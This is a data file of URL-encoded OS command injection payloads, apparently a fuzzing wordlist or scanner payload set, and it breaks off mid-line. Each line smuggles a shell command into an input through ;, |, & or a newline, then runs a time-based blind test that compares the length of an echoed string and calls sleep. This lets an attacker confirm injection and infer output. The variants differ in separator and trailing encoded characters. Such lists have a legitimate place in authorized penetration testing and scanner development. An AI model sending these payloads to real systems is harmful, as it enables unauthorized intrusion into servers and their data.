r%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%7C%20%5B%201%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%202%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%203%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%204%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%205%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%206%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%207%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%208%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%209%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%7C%20%5B%201%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%202%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%203%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%204%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%205%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%206%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%207%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%208%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%209%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%7C%20%5B%201%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%202%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%203%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%204%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%205%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%206%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%207%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%208%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%209%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%7C%20%5B%201%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%202%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%203%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%204%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%205%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%206%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%207%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%208%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%209%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%2